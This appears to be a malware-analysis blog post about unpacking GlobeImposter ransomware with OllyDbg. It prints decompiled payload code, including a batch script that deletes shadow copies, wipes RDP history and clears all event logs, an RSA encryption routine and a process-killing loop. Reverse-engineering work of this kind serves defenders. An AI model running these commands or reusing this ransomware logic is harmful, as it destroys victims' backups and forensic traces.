Let’s Learn: How to Unpack GlobeImposter ".726" Ransomware

Goal: Unpack GlobeImposter ransomware payload using WriteProcessMemory API buffer’s dump (check out the same method as Locky from the previous blog).
ToolollyDbgCFF Explorer, IDA Pro
Credit@dvk01uk
Malware SHA-256: 5b88544bebacba38708685b905a94742c7798bf64b6f90f46acbc3f6de4399e7
Original GlobeImposter sample:

Background
GlobeImposter ransomware utilizes a loader/patcher algorithm patching and unloading the decoded payload in memory.

Theory
GlobeImposter ransomware patches itself using CreateProcessA API setting the creation flag to CREATE_SUSPENDED and writing itself into the buffer via WriteProcessMemory API. Next, the ransomware process won’t be executed immediately; it does not start until called ResumeThread. So, the ransomware has time to patch in memory.

Practice:
I. Load Ollydbg and click “File” ->
II. Click “Go to” -> “Expression” -> Type “WriteProcessMemory” and set up a breakpoint on it using F2.
III. Run the process using F9 and follow buffer to observe the unpacked GlobeImposter in the dump section.
IV.  Then, click on “Backup” -> “Save data to file.”
V. Verify the exported payload and IAT in CFF Explorer. Profit!
VI. Enjoy analyzing the decoded payload in IDA Pro!
(1) Registry persistency:

HKEY\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\CertificatesCheck
(b) GlobeImposter vssadmin & host script:
  GetTempFileNameW(&PathName, L”__tmp”, 0, &TempFileName);
  lstrcatW(&TempFileName, L”.bat”);
  result = CreateFileW(&TempFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
  v1 = result;
  if ( result != (HANDLE)-1 )
  {
    v2 = lstrlenA(“@echo off\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\nreg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\ncd %userprofile%\\documents\\\r\nattrib Default.rdp -s -h\r\ndel Default.rdp \r\nfor /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””);
    WriteFile(
      v1,
      “@echo off\r\n”
      “vssadmin.exe Delete Shadows /All /Quiet\r\n”
      “reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\n”
      “reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\n”
      “reg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\n”
      “cd %userprofile%\\documents\\\r\n”
      “attrib Default.rdp -s -h\r\n”
      “del Default.rdp \r\n”
      “for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””,
      v2,
      &NumberOfBytesWritten,
      0);
    CloseHandle(v1);
    result = (HANDLE)sub_4126D7(&TempFileName);
(c) RSA public encryption key function value:
 v18 = RSA_Encrypt_Function(
          “A57EEE174A1DBCC23CD0CC6045AF9E1CF07706D30588C86941DEC3DA5AA5483BBC85988DA7B18B5C18DA8BF09CC8AF7FD46E7DD57F729A”
          “3D122387BCFE8B86F7A1D051895CD8ABE50F52913C62729979155C7CEF78B114921691FD7F1E1B206B5F98700A053CF04DBE1C44A2D843”
          “EF0C85468F61ABCF5559FE56F124C383B538F4F16ADB61C42AB3B6BFBDDAB4ADC9CB9DFA615A6506CFCAA752C78B270C568B786FF9D50C”
          “A30E21C5431F83E4A2A7695C24BA262233F28D4253CB01C64410C246291DCE84147EB593730A90F013423DE1DFEA1823CCD07B82C36F6E”
          “EF0F6916219D036D395C4CEEC4FDF20CD997ABB3B8B1F2B6D4BBB5065E31516D7386BD23”,
          v15,
          0xC0u);

….
  v3 = lpString;
  memset(&v8, 0, 0x400u);
  memset(&v10, 0, 0x200u);
  sub_4108D0(&v12, v4);
  sub_40FBC8(&v11);
  sub_40FDEC(&v9);
  v5 = lstrlenA(“rsa_encrypt”);
  if ( !sub_40FB4F((int)&v11, (int)&v9, “rsa_encrypt”, v5) && !sub_40F391(&v14, v3) && !sub_40F391(&v15, “010001”) )
  {
    v13 = (unsigned int)(sub_40F4AA(&v14) + 7) >> 3;
    memmove(&v8, a2, a3);
    if ( sub_41028B(&v11, v6, a3, &v8, (int)&v10) )

      memset(&v10, 0, a3);
(d) Taskill function terminating the following processes:
  • “sql”
  • “outlook”
  • “ssms”
  • “postgre”
  • “1c”
  • “excel”
  • “word”
 memset(&StartupInfo, 0, 0x44u);
  StartupInfo.cb = 68;
  result = CreateToolhelp32Snapshot(2u, 0);
  v2 = result;
  if ( result != (HANDLE)-1 )
  {
    pe.dwSize = 556;
    Process32FirstW(result, &pe);
    do
    {
      v3 = (LPCSTR *)off_41B950;
      while ( 1 )
      {
        v4 = sub_4128DF(pe.szExeFile, 0);
        v5 = lstrlenW(pe.szExeFile);
        for ( i = 0; i < v5; i = v8 + 1 )
        {
          v7 = sub_40C31A((char *)v4[i]);
          v4[v8] = v7;
        }
        if ( StrStrA(v4, *v3) )
          break;
        ++v3;
        if ( (signed int)v3 >= (signed int)&unk_41B96C )
          goto LABEL_10;
      }
      v9 = HeapCreate(0, 0x1000u, 0);
      v10 = (CHAR *)HeapAlloc(v9, 0, 0x100u);
      wsprintfA(v10, “%d”, pe.th32ProcessID);
      lstrcpyA(&String1, “taskkill /F /T /PID “);
      lstrcatA(&String1, v10);
      CreateProcessA(0, &String1, 0, 0, 0, 0x8000000u, 0, 0, &StartupInfo, &ProcessInformation);
LABEL_10:
      ;
    }
    while ( Process32NextW(v2, &pe) );
    result = (HANDLE)CloseHandle(v2);
  }
  return result;
(d) Targeted exclusion extensions and README extortion message in Olly:

3 thoughts on “Let’s Learn: How to Unpack GlobeImposter ".726" Ransomware”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s